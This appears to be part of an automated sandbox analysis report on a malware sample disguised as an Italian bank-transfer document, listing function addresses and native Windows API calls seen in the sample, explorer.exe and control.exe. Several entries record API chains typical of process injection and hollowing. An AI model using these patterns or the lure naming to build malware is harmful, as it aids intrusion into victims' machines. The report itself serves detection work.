          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_047C2BF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2BE0 NtQueryValueKey,LdrInitializeThunk,8_2_047C2BE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C35C0 NtCreateMutant,LdrInitializeThunk,8_2_047C35C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C4650 NtSuspendThread,8_2_047C4650
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C4340 NtSetContextThread,8_2_047C4340
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2C00 NtQueryInformationProcess,8_2_047C2C00
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2CF0 NtOpenProcess,8_2_047C2CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2CC0 NtQueryVirtualMemory,8_2_047C2CC0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2D30 NtUnmapViewOfSection,8_2_047C2D30
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2D00 NtSetInformationFile,8_2_047C2D00
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2DB0 NtEnumerateKey,8_2_047C2DB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2E30 NtWriteVirtualMemory,8_2_047C2E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2EE0 NtQueueApcThread,8_2_047C2EE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2E80 NtReadVirtualMemory,8_2_047C2E80
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2F60 NtCreateProcessEx,8_2_047C2F60
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2FB0 NtResumeThread,8_2_047C2FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2FA0 NtQuerySection,8_2_047C2FA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2F90 NtProtectVirtualMemory,8_2_047C2F90
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2AF0 NtWriteFile,8_2_047C2AF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2AB0 NtWaitForSingleObject,8_2_047C2AB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2BA0 NtEnumerateValueKey,8_2_047C2BA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C2B80 NtQueryInformationFile,8_2_047C2B80
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C3010 NtOpenDirectoryObject,8_2_047C3010
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C3090 NtSetValueKey,8_2_047C3090
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C3D70 NtOpenThread,8_2_047C3D70
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C3D10 NtOpenProcessToken,8_2_047C3D10
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C39B0 NtGetContextThread,8_2_047C39B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0254A360 NtCreateFile,8_2_0254A360
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0254A410 NtReadFile,8_2_0254A410
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0254A490 NtClose,8_2_0254A490
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0254A540 NtAllocateVirtualMemory,8_2_0254A540
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0254A35A NtCreateFile,8_2_0254A35A
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0254A40A NtReadFile,8_2_0254A40A
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0453A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,8_2_0453A036
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04539BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,8_2_04539BAF
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0453A042 NtQueryInformationProcess,8_2_0453A042
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04539BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_04539BB2
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 0_2_06C0A0880_2_06C0A088
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 0_2_06C0F1400_2_06C0F140
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 0_2_06C0AC500_2_06C0AC50
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 0_2_06C04D5F0_2_06C04D5F
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 0_2_06C09AE80_2_06C09AE8
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 0_2_06C049380_2_06C04938
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 0_2_06C04CD70_2_06C04CD7
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 0_2_06C04CEC0_2_06C04CEC
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 0_2_06C09ADA0_2_06C09ADA
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 0_2_06C049280_2_06C04928
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 0_2_073B97080_2_073B9708
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 0_2_073B1E780_2_073B1E78
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 0_2_073B26E80_2_073B26E8
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 0_2_073B3EE80_2_073B3EE8
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 0_2_073B43200_2_073B4320
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 0_2_073B22B00_2_073B22B0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_004010306_2_00401030
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_00402D876_2_00402D87
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_00402D906_2_00402D90
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0041EDAD6_2_0041EDAD
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_00409E606_2_00409E60
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0041D7A06_2_0041D7A0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_00402FB06_2_00402FB0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C01006_2_010C0100
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0116A1186_2_0116A118
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011581586_2_01158158
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011901AA6_2_011901AA
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011881CC6_2_011881CC
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011620006_2_01162000
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118A3526_2_0118A352
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010DE3F06_2_010DE3F0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011903E66_2_011903E6
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011702746_2_01170274
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011502C06_2_011502C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D05356_2_010D0535
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011905916_2_01190591
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011824466_2_01182446
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0117E4F66_2_0117E4F6
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F47506_2_010F4750
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D07706_2_010D0770
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CC7C06_2_010CC7C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EC6E06_2_010EC6E0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E69626_2_010E6962
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D29A06_2_010D29A0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0119A9A66_2_0119A9A6
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D28406_2_010D2840
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010DA8406_2_010DA840
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010B68B86_2_010B68B8
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FE8F06_2_010FE8F0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118AB406_2_0118AB40
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01186BD76_2_01186BD7
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CEA806_2_010CEA80
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010DAD006_2_010DAD00
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E8DBF6_2_010E8DBF
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CADE06_2_010CADE0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D0C006_2_010D0C00
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01170CB56_2_01170CB5
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C0CF26_2_010C0CF2
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01112F286_2_01112F28
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F0F306_2_010F0F30
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01144F406_2_01144F40
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114EFA06_2_0114EFA0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C2FC86_2_010C2FC8
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010DCFE06_2_010DCFE0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118EE266_2_0118EE26
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D0E596_2_010D0E59
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118CE936_2_0118CE93
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E2E906_2_010E2E90
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118EEDB6_2_0118EEDB
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0119B16B6_2_0119B16B
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010BF1726_2_010BF172
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0110516C6_2_0110516C
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010DB1B06_2_010DB1B0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D70C06_2_010D70C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0117F0CC6_2_0117F0CC
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011870E96_2_011870E9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118F0E06_2_0118F0E0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118132D6_2_0118132D
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010BD34C6_2_010BD34C
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0111739A6_2_0111739A
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D52A06_2_010D52A0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EB2C06_2_010EB2C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011712ED6_2_011712ED
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011875716_2_01187571
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0116D5B06_2_0116D5B0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118F43F6_2_0118F43F
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C14606_2_010C1460
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118F7B06_2_0118F7B0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011816CC6_2_011816CC
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011659106_2_01165910
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D99506_2_010D9950
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EB9506_2_010EB950
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0113D8006_2_0113D800
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D38E06_2_010D38E0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118FB766_2_0118FB76
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01099B806_2_01099B80
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EFB806_2_010EFB80
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01145BF06_2_01145BF0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0110DBF96_2_0110DBF9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118FA496_2_0118FA49
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01187A466_2_01187A46
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01143A6C6_2_01143A6C
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01115AA06_2_01115AA0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0116DAAC6_2_0116DAAC
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0117DAC66_2_0117DAC6
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01181D5A6_2_01181D5A
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D3D406_2_010D3D40
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01187D736_2_01187D73
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EFDC06_2_010EFDC0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01149C326_2_01149C32
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118FCF26_2_0118FCF2
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118FF096_2_0118FF09
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D1F926_2_010D1F92
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118FFB16_2_0118FFB1
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01093FD26_2_01093FD2
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01093FD56_2_01093FD5
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D9EB06_2_010D9EB0
          Source: C:\Windows\explorer.exeCode function: 7_2_0C3B80367_2_0C3B8036
          Source: C:\Windows\explorer.exeCode function: 7_2_0C3AF0827_2_0C3AF082
          Source: C:\Windows\explorer.exeCode function: 7_2_0C3B69127_2_0C3B6912
          Source: C:\Windows\explorer.exeCode function: 7_2_0C3B0D027_2_0C3B0D02
          Source: C:\Windows\explorer.exeCode function: 7_2_0C3BC5CD7_2_0C3BC5CD
          Source: C:\Windows\explorer.exeCode function: 7_2_0C3B92327_2_0C3B9232
          Source: C:\Windows\explorer.exeCode function: 7_2_0C3B3B327_2_0C3B3B32
          Source: C:\Windows\explorer.exeCode function: 7_2_0C3B3B307_2_0C3B3B30
          Source: C:\Windows\explorer.exeCode function: 7_2_0C6112327_2_0C611232
          Source: C:\Windows\explorer.exeCode function: 7_2_0C6100367_2_0C610036
          Source: C:\Windows\explorer.exeCode function: 7_2_0C6070827_2_0C607082
          Source: C:\Windows\explorer.exeCode function: 7_2_0C60BB307_2_0C60BB30
          Source: C:\Windows\explorer.exeCode function: 7_2_0C60BB327_2_0C60BB32
          Source: C:\Windows\explorer.exeCode function: 7_2_0C608D027_2_0C608D02
          Source: C:\Windows\explorer.exeCode function: 7_2_0C60E9127_2_0C60E912
          Source: C:\Windows\explorer.exeCode function: 7_2_0C6145CD7_2_0C6145CD
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0022764B8_2_0022764B
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0022305C8_2_0022305C
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0022978B8_2_0022978B
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0483E4F68_2_0483E4F6
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048424468_2_04842446
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048505918_2_04850591
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047905358_2_04790535
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047AC6E08_2_047AC6E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047907708_2_04790770
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047B47508_2_047B4750
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0478C7C08_2_0478C7C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048501AA8_2_048501AA
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048481CC8_2_048481CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047801008_2_04780100
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0482A1188_2_0482A118
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048181588_2_04818158
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048102C08_2_048102C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048302748_2_04830274
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048503E68_2_048503E6
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0479E3F08_2_0479E3F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0484A3528_2_0484A352
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04830CB58_2_04830CB5
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04790C008_2_04790C00
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04780CF28_2_04780CF2
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0479AD008_2_0479AD00
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0478ADE08_2_0478ADE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047A8DBF8_2_047A8DBF
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0484CE938_2_0484CE93
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04790E598_2_04790E59
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0484EEDB8_2_0484EEDB
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0484EE268_2_0484EE26
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047A2E908_2_047A2E90
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0480EFA08_2_0480EFA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047B0F308_2_047B0F30
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047D2F288_2_047D2F28
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0479CFE08_2_0479CFE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04782FC88_2_04782FC8
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04804F408_2_04804F40
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0479A8408_2_0479A840
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047928408_2_04792840
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047BE8F08_2_047BE8F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047768B88_2_047768B8
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047A69628_2_047A6962
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0485A9A68_2_0485A9A6
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047929A08_2_047929A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0478EA808_2_0478EA80
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04846BD78_2_04846BD7
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0484AB408_2_0484AB40
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047814608_2_04781460
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0484F43F8_2_0484F43F
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0482D5B08_2_0482D5B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048475718_2_04847571
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048416CC8_2_048416CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0484F7B08_2_0484F7B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0483F0CC8_2_0483F0CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0484F0E08_2_0484F0E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048470E98_2_048470E9
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047970C08_2_047970C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0477F1728_2_0477F172
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047C516C8_2_047C516C
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0479B1B08_2_0479B1B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0485B16B8_2_0485B16B
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_048312ED8_2_048312ED
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047AB2C08_2_047AB2C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047952A08_2_047952A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0477D34C8_2_0477D34C
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0484132D8_2_0484132D
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047D739A8_2_047D739A
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0484FCF28_2_0484FCF2
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04809C328_2_04809C32
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04793D408_2_04793D40
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047AFDC08_2_047AFDC0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04841D5A8_2_04841D5A
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04847D738_2_04847D73
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04799EB08_2_04799EB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0484FFB18_2_0484FFB1
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0484FF098_2_0484FF09
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04791F928_2_04791F92
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047FD8008_2_047FD800
